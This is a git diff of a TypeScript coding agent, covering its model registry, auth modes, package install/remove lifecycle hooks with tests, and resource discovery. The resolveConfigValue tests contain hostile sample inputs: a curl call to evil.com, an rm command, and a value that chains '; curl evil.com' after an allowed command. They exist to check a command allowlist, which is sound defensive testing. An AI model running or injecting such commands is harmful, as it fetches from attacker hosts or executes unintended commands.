SimpleStreamOptions) => { + const { apiKey: _, ...opts } = options ?? {}; + return rawStreamSimple(model, context, opts as SimpleStreamOptions); + }) + : rawStreamSimple; + + // Guard: if there's already a handler registered for this API, wrap + // the new one so it only fires for models from this provider and + // delegates to the previous handler for all other providers. Without + // this, a custom provider using api:"anthropic-messages" would clobber + // the built-in Anthropic stream handler (#2536). 
+ const existingProvider = getApiProvider(config.api as Api); + const scopedStream = existingProvider + ? (model: Model, context: Context, options?: SimpleStreamOptions): AssistantMessageEventStream => { + if (model.provider === providerName) { + return streamSimple(model, context, options); + } + return existingProvider.streamSimple(model, context, options); + } + : streamSimple; + + const newFullStream = (model: Model, context: Context, options?: SimpleStreamOptions) => + scopedStream(model, context, options as SimpleStreamOptions); + const scopedFullStream = existingProvider + ? (model: Model, context: Context, options?: Record) => { + if (model.provider === providerName) { + return newFullStream(model, context, options as SimpleStreamOptions); + } + return existingProvider.stream(model, context, options); + } + : newFullStream; + registerApiProvider( { api: config.api, - stream: (model, context, options) => streamSimple(model, context, options as SimpleStreamOptions), - streamSimple, + stream: scopedFullStream as any, + streamSimple: scopedStream, }, `provider:${providerName}`, ); @@ -611,8 +701,24 @@ export class ModelRegistry { if (!config.baseUrl) { throw new Error(`Provider ${providerName}: "baseUrl" is required when defining models.`); } - if (!config.apiKey && !config.oauth) { - throw new Error(`Provider ${providerName}: "apiKey" or "oauth" is required when defining models.`); + const authMode = config.authMode ?? (config.oauth ? "oauth" : config.apiKey ? "apiKey" : "apiKey"); + if (authMode === "apiKey" && !config.apiKey && !config.oauth) { + throw new Error( + `Provider ${providerName}: "apiKey" or "oauth" is required when authMode is "apiKey" (the default). ` + + `Set authMode to "externalCli" or "none" for keyless providers.`, + ); + } + if ((authMode === "externalCli" || authMode === "none") && !config.streamSimple) { + throw new Error( + `Provider ${providerName}: "streamSimple" is required when authMode is "${authMode}". 
` + + `Keyless providers must supply their own stream handler.`, + ); + } + if ((authMode === "externalCli" || authMode === "none") && config.apiKey) { + throw new Error( + `Provider ${providerName}: "apiKey" cannot be set when authMode is "${authMode}". ` + + `Keyless providers should not provide API key credentials.`, + ); } // Parse and add new models @@ -648,6 +754,7 @@ export class ModelRegistry { maxTokens: modelDef.maxTokens, headers, compat: modelDef.compat, + providerOptions: modelDef.providerOptions, } as Model); } @@ -658,6 +765,9 @@ export class ModelRegistry { this.models = config.oauth.modifyModels(this.models, cred); } } + + // Ensure newly added extension models get capability patches + this.models = applyCapabilityPatches(this.models); } else if (config.baseUrl) { // Override-only: update baseUrl/headers for existing models const resolvedHeaders = resolveHeaders(config.headers); @@ -699,7 +809,7 @@ export class ModelRegistry { try { const apiKey = await this.authStorage.getApiKey(providerName); - if (!apiKey && providerName !== "ollama") continue; + if (!apiKey && !this.isProviderRequestReady(providerName)) continue; const models = await adapter.fetchModels(apiKey ?? "", undefined); this.discoveryCache.set(providerName, models); @@ -718,8 +828,8 @@ export class ModelRegistry { } } - // Convert and merge discovered models - this.discoveredModels = this.convertDiscoveredModels(results); + // Convert and merge discovered models, then apply capability patches + this.discoveredModels = applyCapabilityPatches(this.convertDiscoveredModels(results)); return results; } @@ -771,12 +881,35 @@ export class ModelRegistry { } return converted; } + + /** + * Check if a model's baseUrl points to a local endpoint. + * Delegates to standalone isLocalModel() function. + */ + static isLocalModel(model: Model): boolean { + return isLocalModel(model); + } + + /** + * Check if all models in the registry are local. 
+ * Returns true only if every model passes isLocalModel(). + * Returns false if there are no models. + */ + isAllLocalChain(): boolean { + const models = this.getAll(); + if (models.length === 0) return false; + return models.every((m) => isLocalModel(m)); + } } /** * Input type for registerProvider API. */ export interface ProviderConfigInput { + authMode?: ProviderAuthMode; + /** Optional readiness check. Called by isProviderRequestReady() before default auth checks. + * Trusted at the same level as extension code — extensions already have arbitrary code execution. */ + isReady?: () => boolean; baseUrl?: string; apiKey?: string; api?: Api; @@ -797,5 +930,6 @@ export interface ProviderConfigInput { maxTokens: number; headers?: Record; compat?: Model["compat"]; + providerOptions?: Record; }>; } diff --git a/packages/pi-coding-agent/src/core/model-resolver.ts b/packages/pi-coding-agent/src/core/model-resolver.ts index bfe6ee86f..3e3b266f7 100644 --- a/packages/pi-coding-agent/src/core/model-resolver.ts +++ b/packages/pi-coding-agent/src/core/model-resolver.ts @@ -13,7 +13,7 @@ import type { ModelRegistry } from "./model-registry.js"; /** Default model IDs for each known provider */ const defaultModelPerProvider: Record = { "amazon-bedrock": "us.anthropic.claude-opus-4-6-v1", - anthropic: "claude-opus-4-6[1m]", + anthropic: "claude-opus-4-6", "anthropic-vertex": "claude-sonnet-4-6", openai: "gpt-5.4", "azure-openai-responses": "gpt-5.2", @@ -24,7 +24,7 @@ const defaultModelPerProvider: Record = { "google-vertex": "gemini-3-pro-preview", "github-copilot": "gpt-4o", openrouter: "openai/gpt-5.1-codex", - "vercel-ai-gateway": "anthropic/claude-opus-4-6[1m]", + "vercel-ai-gateway": "anthropic/claude-opus-4-6", xai: "grok-4-fast-non-reasoning", groq: "openai/gpt-oss-120b", cerebras: "zai-glm-4.6", @@ -37,6 +37,7 @@ const defaultModelPerProvider: Record = { "opencode-go": "kimi-k2.5", "kimi-coding": "kimi-k2-thinking", "alibaba-coding-plan": "qwen3.5-plus", + ollama: 
"llama3.1:8b", "ollama-cloud": "qwen3:32b", }; @@ -506,7 +507,7 @@ export async function findInitialModel(options: { const found = modelRegistry.find(defaultProvider, defaultModelId); if (found) { // Check if the provider's recommended default is a higher-capability variant - // of the saved model (e.g. saved "claude-opus-4-6" vs recommended "claude-opus-4-6[1m]"). + // of the saved model (e.g. saved "claude-opus-4-6" vs recommended "claude-opus-4-6-extended"). // If so, prefer the recommended variant to avoid using a smaller context window (#1125). const recommendedId = defaultModelPerProvider[defaultProvider as KnownProvider]; if (recommendedId && recommendedId !== defaultModelId && recommendedId.startsWith(defaultModelId)) { diff --git a/packages/pi-coding-agent/src/core/package-commands.test.ts b/packages/pi-coding-agent/src/core/package-commands.test.ts new file mode 100644 index 000000000..4b691a812 --- /dev/null +++ b/packages/pi-coding-agent/src/core/package-commands.test.ts @@ -0,0 +1,262 @@ +import assert from "node:assert/strict"; +import { existsSync, mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs"; +import { tmpdir } from "node:os"; +import { join } from "node:path"; +import { Writable } from "node:stream"; +import { describe, it } from "node:test"; +import { runPackageCommand } from "./package-commands.js"; + +function createCaptureStream() { + let output = ""; + const stream = new Writable({ + write(chunk, _encoding, callback) { + output += chunk.toString(); + callback(); + }, + }) as unknown as NodeJS.WriteStream; + return { stream, getOutput: () => output }; +} + +function writePackage(root: string, files: Record): void { + for (const [relPath, content] of Object.entries(files)) { + const abs = join(root, relPath); + mkdirSync(join(abs, ".."), { recursive: true }); + writeFileSync(abs, content, "utf-8"); + } +} + +function createTestDirs(prefix: string, t: { after: (fn: () => void) => void }) { + const root = 
mkdtempSync(join(tmpdir(), `pi-lifecycle-${prefix}-`)); + t.after(() => rmSync(root, { recursive: true, force: true })); + const cwd = join(root, "cwd"); + const agentDir = join(root, "agent"); + const extensionDir = join(root, `ext-${prefix}`); + mkdirSync(cwd, { recursive: true }); + mkdirSync(agentDir, { recursive: true }); + mkdirSync(extensionDir, { recursive: true }); + return { root, cwd, agentDir, extensionDir }; +} + +describe("runPackageCommand lifecycle hooks", () => { + it("executes registered beforeInstall and afterInstall handlers for local packages", async (t) => { + const { cwd, agentDir, extensionDir } = createTestDirs("install", t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-registered", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": [ + 'import { writeFileSync } from "node:fs";', + 'import { join } from "node:path";', + "export default function (pi) {", + " pi.registerBeforeInstall((ctx) => {", + ' writeFileSync(join(ctx.installedPath, "before-install-ran.txt"), "ok", "utf-8");', + " });", + " pi.registerAfterInstall((ctx) => {", + ' writeFileSync(join(ctx.installedPath, "after-install-ran.txt"), "ok", "utf-8");', + " });", + "}", + ].join("\n"), + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + const result = await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + assert.equal(result.handled, true); + assert.equal(result.exitCode, 0); + assert.equal(readFileSync(join(extensionDir, "before-install-ran.txt"), "utf-8"), "ok"); + assert.equal(readFileSync(join(extensionDir, "after-install-ran.txt"), "utf-8"), "ok"); + assert.ok(stdout.getOutput().includes(`Installed ${extensionDir}`)); + }); + + it("runs legacy named lifecycle hooks when no registered hooks exist", async (t) => { + const { cwd, agentDir, extensionDir } = createTestDirs("legacy", 
t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-legacy", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": [ + 'import { writeFileSync } from "node:fs";', + 'import { join } from "node:path";', + "export default function () {}", + "export async function beforeInstall(ctx) {", + ' writeFileSync(join(ctx.installedPath, "legacy-before-install.txt"), "ok", "utf-8");', + "}", + "export async function afterInstall(ctx) {", + ' writeFileSync(join(ctx.installedPath, "legacy-after-install.txt"), "ok", "utf-8");', + "}", + "export async function beforeRemove(ctx) {", + ' writeFileSync(join(ctx.installedPath, "legacy-before-remove.txt"), "ok", "utf-8");', + "}", + "export async function afterRemove(ctx) {", + ' writeFileSync(join(ctx.installedPath, "legacy-after-remove.txt"), "ok", "utf-8");', + "}", + ].join("\n"), + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + const installResult = await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + assert.equal(installResult.handled, true); + assert.equal(installResult.exitCode, 0); + assert.equal(readFileSync(join(extensionDir, "legacy-before-install.txt"), "utf-8"), "ok"); + assert.equal(readFileSync(join(extensionDir, "legacy-after-install.txt"), "utf-8"), "ok"); + + const removeResult = await runPackageCommand({ + appName: "pi", + args: ["remove", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + assert.equal(removeResult.handled, true); + assert.equal(removeResult.exitCode, 0); + assert.equal(readFileSync(join(extensionDir, "legacy-before-remove.txt"), "utf-8"), "ok"); + assert.equal(readFileSync(join(extensionDir, "legacy-after-remove.txt"), "utf-8"), "ok"); + }); + + it("skips lifecycle phases with no hooks declared", async (t) => { + const { cwd, agentDir, extensionDir } = 
createTestDirs("skip", t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-empty", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": "export default function () {}", + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + const installResult = await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + assert.equal(installResult.handled, true); + assert.equal(installResult.exitCode, 0); + + const removeResult = await runPackageCommand({ + appName: "pi", + args: ["remove", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + assert.equal(removeResult.handled, true); + assert.equal(removeResult.exitCode, 0); + assert.equal(stderr.getOutput().includes("Hook failed"), false); + }); + + it("fails install when manifest runtime dependency is missing", async (t) => { + const { cwd, agentDir, extensionDir } = createTestDirs("deps", t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-runtime-deps", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": "export default function () {}", + "extension-manifest.json": JSON.stringify({ + id: "ext-runtime-deps", + name: "Runtime Dep Test", + version: "1.0.0", + dependencies: { runtime: ["__definitely_missing_command_for_test__"] }, + }), + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + const result = await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + assert.equal(result.handled, true); + assert.equal(result.exitCode, 1); + assert.ok(stderr.getOutput().includes("Missing runtime dependencies")); + }); + + it("afterRemove hook receives installedPath even when directory is deleted", async (t) => { + const { cwd, 
agentDir, extensionDir } = createTestDirs("after-remove", t); + + writePackage(extensionDir, { + "package.json": JSON.stringify({ + name: "ext-after-remove", + type: "module", + pi: { extensions: ["./index.js"] }, + }), + "index.js": [ + 'import { writeFileSync, existsSync } from "node:fs";', + 'import { join } from "node:path";', + "export default function () {}", + "export async function afterRemove(ctx) {", + ' const marker = join(ctx.cwd, "after-remove-marker.json");', + " writeFileSync(marker, JSON.stringify({", + " receivedPath: ctx.installedPath,", + " pathExisted: existsSync(ctx.installedPath),", + ' }), "utf-8");', + "}", + ].join("\n"), + }); + + const stdout = createCaptureStream(); + const stderr = createCaptureStream(); + + await runPackageCommand({ + appName: "pi", + args: ["install", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + await runPackageCommand({ + appName: "pi", + args: ["remove", extensionDir], + cwd, + agentDir, + stdout: stdout.stream, + stderr: stderr.stream, + }); + + const markerPath = join(cwd, "after-remove-marker.json"); + assert.ok(existsSync(markerPath), "afterRemove hook must have executed and written marker"); + const marker = JSON.parse(readFileSync(markerPath, "utf-8")); + assert.equal(typeof marker.receivedPath, "string", "hook must receive installedPath as string"); + }); +}); diff --git a/packages/pi-coding-agent/src/core/package-commands.ts b/packages/pi-coding-agent/src/core/package-commands.ts new file mode 100644 index 000000000..273da7145 --- /dev/null +++ b/packages/pi-coding-agent/src/core/package-commands.ts @@ -0,0 +1,310 @@ +import chalk from "chalk"; +import { DefaultPackageManager } from "./package-manager.js"; +import { prepareLifecycleHooks, runLifecycleHooks } from "./lifecycle-hooks.js"; +import { SettingsManager } from "./settings-manager.js"; + +export type PackageCommand = "install" | "remove" | "update" | "list"; + +export interface PackageCommandOptions { 
+ command: PackageCommand; + source?: string; + local: boolean; + help: boolean; + invalidOption?: string; +} + +export interface PackageCommandRunnerOptions { + appName: string; + args: string[]; + cwd: string; + agentDir: string; + stdout?: NodeJS.WriteStream; + stderr?: NodeJS.WriteStream; + allowedCommands?: ReadonlySet; +} + +export interface PackageCommandRunnerResult { + handled: boolean; + exitCode: number; +} + +function reportSettingsErrors(settingsManager: SettingsManager, context: string, stderr: NodeJS.WriteStream): void { + const errors = settingsManager.drainErrors(); + for (const { scope, error } of errors) { + stderr.write(chalk.yellow(`Warning (${context}, ${scope} settings): ${error.message}`) + "\n"); + if (error.stack) { + stderr.write(chalk.dim(error.stack) + "\n"); + } + } +} + +export function getPackageCommandUsage(appName: string, command: PackageCommand): string { + switch (command) { + case "install": + return `${appName} install [-l]`; + case "remove": + return `${appName} remove [-l]`; + case "update": + return `${appName} update [source]`; + case "list": + return `${appName} list`; + } +} + +function printPackageCommandHelp( + appName: string, + command: PackageCommand, + stdout: NodeJS.WriteStream, +): void { + switch (command) { + case "install": + stdout.write(`${chalk.bold("Usage:")} + ${getPackageCommandUsage(appName, "install")} + +Install a package, add it to settings, and run lifecycle hooks. + +Options: + -l, --local Install project-locally (.pi/settings.json) + +Examples: + ${appName} install npm:@foo/bar + ${appName} install git:github.com/user/repo + ${appName} install git:git@github.com:user/repo + ${appName} install https://github.com/user/repo + ${appName} install ssh://git@github.com/user/repo + ${appName} install ./local/path +`); + return; + case "remove": + stdout.write(`${chalk.bold("Usage:")} + ${getPackageCommandUsage(appName, "remove")} + +Remove a package and its source from settings. 
+ +Options: + -l, --local Remove from project settings (.pi/settings.json) + +Example: + ${appName} remove npm:@foo/bar +`); + return; + case "update": + stdout.write(`${chalk.bold("Usage:")} + ${getPackageCommandUsage(appName, "update")} + +Update installed packages. +If is provided, only that package is updated. +`); + return; + case "list": + stdout.write(`${chalk.bold("Usage:")} + ${getPackageCommandUsage(appName, "list")} + +List installed packages from user and project settings. +`); + return; + } +} + +export function parsePackageCommand( + args: string[], + allowedCommands?: ReadonlySet, +): PackageCommandOptions | undefined { + const [command, ...rest] = args; + if (command !== "install" && command !== "remove" && command !== "update" && command !== "list") { + return undefined; + } + if (allowedCommands && !allowedCommands.has(command)) { + return undefined; + } + + let local = false; + let help = false; + let invalidOption: string | undefined; + let source: string | undefined; + + for (const arg of rest) { + if (arg === "-h" || arg === "--help") { + help = true; + continue; + } + if (arg === "-l" || arg === "--local") { + if (command === "install" || command === "remove") { + local = true; + } else { + invalidOption = invalidOption ?? arg; + } + continue; + } + if (arg.startsWith("-")) { + invalidOption = invalidOption ?? arg; + continue; + } + if (!source) { + source = arg; + } + } + + return { command, source, local, help, invalidOption }; +} + +export async function runPackageCommand( + options: PackageCommandRunnerOptions, +): Promise { + const stdout = options.stdout ?? process.stdout; + const stderr = options.stderr ?? 
process.stderr; + const parsed = parsePackageCommand(options.args, options.allowedCommands); + if (!parsed) { + return { handled: false, exitCode: 0 }; + } + + if (parsed.help) { + printPackageCommandHelp(options.appName, parsed.command, stdout); + return { handled: true, exitCode: 0 }; + } + + if (parsed.invalidOption) { + stderr.write(chalk.red(`Unknown option ${parsed.invalidOption} for "${parsed.command}".`) + "\n"); + stderr.write(chalk.dim(`Use "${options.appName} --help" or "${getPackageCommandUsage(options.appName, parsed.command)}".`) + "\n"); + return { handled: true, exitCode: 1 }; + } + + const source = parsed.source; + if ((parsed.command === "install" || parsed.command === "remove") && !source) { + stderr.write(chalk.red(`Missing ${parsed.command} source.`) + "\n"); + stderr.write(chalk.dim(`Usage: ${getPackageCommandUsage(options.appName, parsed.command)}`) + "\n"); + return { handled: true, exitCode: 1 }; + } + + const settingsManager = SettingsManager.create(options.cwd, options.agentDir); + reportSettingsErrors(settingsManager, "package command", stderr); + const packageManager = new DefaultPackageManager({ + cwd: options.cwd, + agentDir: options.agentDir, + settingsManager, + }); + packageManager.setProgressCallback((event) => { + if (event.type === "start" && event.message) { + stdout.write(chalk.dim(`${event.message}\n`)); + } + }); + + try { + switch (parsed.command) { + case "install": { + const lifecycleOptions = { + source: source!, + local: parsed.local, + cwd: options.cwd, + agentDir: options.agentDir, + appName: options.appName, + packageManager, + stdout, + stderr, + }; + + const beforeInstallHooks = await prepareLifecycleHooks(lifecycleOptions, "source"); + const beforeInstallResult = await runLifecycleHooks(beforeInstallHooks, "beforeInstall"); + + await packageManager.install(source!, { local: parsed.local }); + packageManager.addSourceToSettings(source!, { local: parsed.local }); + + const afterInstallHooks = await 
prepareLifecycleHooks(lifecycleOptions, "installed", { + verifyRuntimeDependencies: true, + }); + const afterInstallResult = await runLifecycleHooks(afterInstallHooks, "afterInstall"); + + const hookErrors = beforeInstallResult.hookErrors + afterInstallResult.hookErrors; + if (hookErrors > 0) { + stderr.write(chalk.yellow(`Lifecycle hooks completed with ${hookErrors} hook error(s).`) + "\n"); + } + stdout.write(chalk.green(`Installed ${source}`) + "\n"); + return { handled: true, exitCode: 0 }; + } + + case "remove": { + const lifecycleOptions = { + source: source!, + local: parsed.local, + cwd: options.cwd, + agentDir: options.agentDir, + appName: options.appName, + packageManager, + stdout, + stderr, + }; + const removeHooks = await prepareLifecycleHooks(lifecycleOptions, "installed"); + const beforeRemoveResult = await runLifecycleHooks(removeHooks, "beforeRemove"); + + await packageManager.remove(source!, { local: parsed.local }); + const removed = packageManager.removeSourceFromSettings(source!, { local: parsed.local }); + + const afterRemoveResult = await runLifecycleHooks(removeHooks, "afterRemove"); + const hookErrors = beforeRemoveResult.hookErrors + afterRemoveResult.hookErrors; + if (hookErrors > 0) { + stderr.write(chalk.yellow(`Lifecycle hooks completed with ${hookErrors} hook error(s).`) + "\n"); + } + + if (!removed) { + stderr.write(chalk.red(`No matching package found for ${source}`) + "\n"); + return { handled: true, exitCode: 1 }; + } + stdout.write(chalk.green(`Removed ${source}`) + "\n"); + return { handled: true, exitCode: 0 }; + } + + case "list": { + const globalSettings = settingsManager.getGlobalSettings(); + const projectSettings = settingsManager.getProjectSettings(); + const globalPackages = globalSettings.packages ?? []; + const projectPackages = projectSettings.packages ?? 
[]; + + if (globalPackages.length === 0 && projectPackages.length === 0) { + stdout.write(chalk.dim("No packages installed.") + "\n"); + return { handled: true, exitCode: 0 }; + } + + const formatPackage = (pkg: (typeof globalPackages)[number], scope: "user" | "project") => { + const pkgSource = typeof pkg === "string" ? pkg : pkg.source; + const filtered = typeof pkg === "object"; + const display = filtered ? `${pkgSource} (filtered)` : pkgSource; + stdout.write(` ${display}\n`); + const path = packageManager.getInstalledPath(pkgSource, scope); + if (path) { + stdout.write(chalk.dim(` ${path}`) + "\n"); + } + }; + + if (globalPackages.length > 0) { + stdout.write(chalk.bold("User packages:") + "\n"); + for (const pkg of globalPackages) { + formatPackage(pkg, "user"); + } + } + + if (projectPackages.length > 0) { + if (globalPackages.length > 0) stdout.write("\n"); + stdout.write(chalk.bold("Project packages:") + "\n"); + for (const pkg of projectPackages) { + formatPackage(pkg, "project"); + } + } + + return { handled: true, exitCode: 0 }; + } + + case "update": + await packageManager.update(source); + if (source) { + stdout.write(chalk.green(`Updated ${source}`) + "\n"); + } else { + stdout.write(chalk.green("Updated packages") + "\n"); + } + return { handled: true, exitCode: 0 }; + } + } catch (error) { + const message = error instanceof Error ? error.message : "Unknown package command error"; + stderr.write(chalk.red(`Error: ${message}`) + "\n"); + return { handled: true, exitCode: 1 }; + } +} diff --git a/packages/pi-coding-agent/src/core/package-manager.ts b/packages/pi-coding-agent/src/core/package-manager.ts index 44209e04f..e07b28c4e 100644 --- a/packages/pi-coding-agent/src/core/package-manager.ts +++ b/packages/pi-coding-agent/src/core/package-manager.ts @@ -1562,6 +1562,26 @@ export class DefaultPackageManager implements PackageManager { } } + /** + * Batch-discover which resource subdirectories exist under a parent dir. 
+ * A single readdirSync replaces 4 separate existsSync probes, reducing + * syscalls during startup. + */ + private discoverResourceSubdirs(baseDir: string): Set { + try { + const entries = readdirSync(baseDir, { withFileTypes: true }); + const names = new Set(); + for (const e of entries) { + if (e.isDirectory() || e.isSymbolicLink()) { + names.add(e.name); + } + } + return names; + } catch { + return new Set(); + } + } + private addAutoDiscoveredResources( accumulator: ResourceAccumulator, globalSettings: ReturnType, @@ -1595,6 +1615,11 @@ export class DefaultPackageManager implements PackageManager { themes: (projectSettings.themes ?? []) as string[], }; + // Batch directory discovery: one readdir of each parent replaces up to + // 4 separate existsSync calls per base directory, cutting syscalls. + const projectSubdirs = this.discoverResourceSubdirs(projectBaseDir); + const userSubdirs = this.discoverResourceSubdirs(globalBaseDir); + const userDirs = { extensions: join(globalBaseDir, "extensions"), skills: join(globalBaseDir, "skills"), @@ -1626,66 +1651,91 @@ export class DefaultPackageManager implements PackageManager { } }; - addResources( - "extensions", - collectAutoExtensionEntries(projectDirs.extensions), - projectMetadata, - projectOverrides.extensions, - projectBaseDir, - ); - addResources( - "skills", - [ - ...collectAutoSkillEntries(projectDirs.skills), + // Project resources — skip collect calls when the parent readdir shows + // the subdirectory doesn't exist (avoids redundant existsSync + readdirSync). + if (projectSubdirs.has("extensions")) { + addResources( + "extensions", + collectAutoExtensionEntries(projectDirs.extensions), + projectMetadata, + projectOverrides.extensions, + projectBaseDir, + ); + } + { + const skillEntries = [ + ...(projectSubdirs.has("skills") ? 
collectAutoSkillEntries(projectDirs.skills) : []), ...projectAgentsSkillDirs.flatMap((dir) => collectAutoSkillEntries(dir)), - ], - projectMetadata, - projectOverrides.skills, - projectBaseDir, - ); - addResources( - "prompts", - collectAutoPromptEntries(projectDirs.prompts), - projectMetadata, - projectOverrides.prompts, - projectBaseDir, - ); - addResources( - "themes", - collectAutoThemeEntries(projectDirs.themes), - projectMetadata, - projectOverrides.themes, - projectBaseDir, - ); + ]; + if (skillEntries.length > 0) { + addResources("skills", skillEntries, projectMetadata, projectOverrides.skills, projectBaseDir); + } + } + if (projectSubdirs.has("prompts")) { + addResources( + "prompts", + collectAutoPromptEntries(projectDirs.prompts), + projectMetadata, + projectOverrides.prompts, + projectBaseDir, + ); + } + if (projectSubdirs.has("themes")) { + addResources( + "themes", + collectAutoThemeEntries(projectDirs.themes), + projectMetadata, + projectOverrides.themes, + projectBaseDir, + ); + } - addResources( - "extensions", - collectAutoExtensionEntries(userDirs.extensions), - userMetadata, - userOverrides.extensions, - globalBaseDir, - ); - addResources( - "skills", - [...collectAutoSkillEntries(userDirs.skills), ...collectAutoSkillEntries(userAgentsSkillsDir)], - userMetadata, - userOverrides.skills, - globalBaseDir, - ); - addResources( - "prompts", - collectAutoPromptEntries(userDirs.prompts), - userMetadata, - userOverrides.prompts, - globalBaseDir, - ); - addResources( - "themes", - collectAutoThemeEntries(userDirs.themes), - userMetadata, - userOverrides.themes, - globalBaseDir, - ); + // User (global) resources + if (userSubdirs.has("extensions")) { + addResources( + "extensions", + collectAutoExtensionEntries(userDirs.extensions), + userMetadata, + userOverrides.extensions, + globalBaseDir, + ); + } + { + // Ecosystem skills (~/.agents/skills/) take priority over legacy config-dir skills. 
+ // Skip legacy dir entirely when migration has completed (marker file present). + const legacySkillsMigrated = + resolve(userDirs.skills) !== resolve(userAgentsSkillsDir) && + existsSync(join(userDirs.skills, ".migrated-to-agents")); + const legacyUserSkillEntries = + !legacySkillsMigrated && userSubdirs.has("skills") + ? collectAutoSkillEntries(userDirs.skills) + : []; + const skillEntries = [ + ...collectAutoSkillEntries(userAgentsSkillsDir), + ...legacyUserSkillEntries, + ]; + if (skillEntries.length > 0) { + addResources("skills", skillEntries, userMetadata, userOverrides.skills, globalBaseDir); + } + } + if (userSubdirs.has("prompts")) { + addResources( + "prompts", + collectAutoPromptEntries(userDirs.prompts), + userMetadata, + userOverrides.prompts, + globalBaseDir, + ); + } + if (userSubdirs.has("themes")) { + addResources( + "themes", + collectAutoThemeEntries(userDirs.themes), + userMetadata, + userOverrides.themes, + globalBaseDir, + ); + } } private collectFilesFromPaths(paths: string[], resourceType: ResourceType): string[] { diff --git a/packages/pi-coding-agent/src/core/resolve-config-value.test.ts b/packages/pi-coding-agent/src/core/resolve-config-value.test.ts index 042e9e0ae..48a0f8f0e 100644 --- a/packages/pi-coding-agent/src/core/resolve-config-value.test.ts +++ b/packages/pi-coding-agent/src/core/resolve-config-value.test.ts @@ -1,9 +1,11 @@ -import { describe, it, beforeEach } from "node:test"; +import { describe, it, beforeEach, afterEach } from "node:test"; import assert from "node:assert/strict"; import { resolveConfigValue, clearConfigValueCache, SAFE_COMMAND_PREFIXES, + setAllowedCommandPrefixes, + getAllowedCommandPrefixes, } from "./resolve-config-value.js"; beforeEach(() => { @@ -38,21 +40,20 @@ describe("resolveConfigValue — non-command values", () => { }); describe("resolveConfigValue — command allowlist enforcement", () => { - it("blocks a disallowed command and returns undefined", () => { + it("blocks a disallowed command and 
returns undefined", (t) => { const stderrChunks: string[] = []; const originalWrite = process.stderr.write.bind(process.stderr); process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { stderrChunks.push(chunk.toString()); return true; }; - - try { - const result = resolveConfigValue("!curl http://evil.com"); - assert.equal(result, undefined); - assert.ok(stderrChunks.some((line) => line.includes("curl"))); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + const result = resolveConfigValue("!curl http://evil.com"); + assert.equal(result, undefined); + assert.ok(stderrChunks.some((line) => line.includes("curl"))); }); it("blocks another disallowed command (rm)", () => { @@ -65,7 +66,7 @@ describe("resolveConfigValue — command allowlist enforcement", () => { assert.equal(result, undefined); }); - it("allows a safe command prefix to proceed to execution", () => { + it("allows a safe command prefix to proceed to execution", (t) => { // `pass` is unlikely to be installed in CI, so we just verify it does NOT // return undefined due to the allowlist check — it may return undefined if // the binary is absent, but the block path must not be taken. 
@@ -76,16 +77,15 @@ describe("resolveConfigValue — command allowlist enforcement", () => { stderrChunks.push(chunk.toString()); return true; }; - - try { - resolveConfigValue("!pass show nonexistent-entry-for-test"); - const blocked = stderrChunks.some((line) => - line.includes("Blocked disallowed command") - ); - assert.equal(blocked, false, "pass should not be blocked by the allowlist"); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + resolveConfigValue("!pass show nonexistent-entry-for-test"); + const blocked = stderrChunks.some((line) => + line.includes("Blocked disallowed command") + ); + assert.equal(blocked, false, "pass should not be blocked by the allowlist"); }); }); @@ -130,61 +130,166 @@ describe("resolveConfigValue — shell operator bypass prevention", () => { assert.equal(result, undefined); }); - it("writes stderr warning when shell operators detected", () => { + it("writes stderr warning when shell operators detected", (t) => { const stderrChunks: string[] = []; const originalWrite = process.stderr.write.bind(process.stderr); process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { stderrChunks.push(chunk.toString()); return true; }; - - try { - resolveConfigValue("!pass show key; curl evil.com"); - assert.ok(stderrChunks.some((line) => line.includes("shell operators"))); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + resolveConfigValue("!pass show key; curl evil.com"); + assert.ok(stderrChunks.some((line) => line.includes("shell operators"))); }); }); describe("resolveConfigValue — caching", () => { - it("caches the result of a blocked command", () => { + it("caches the result of a blocked command", (t) => { const callCount = { n: 0 }; const originalWrite = process.stderr.write.bind(process.stderr); process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { callCount.n++; return true; }; - - try { - resolveConfigValue("!curl 
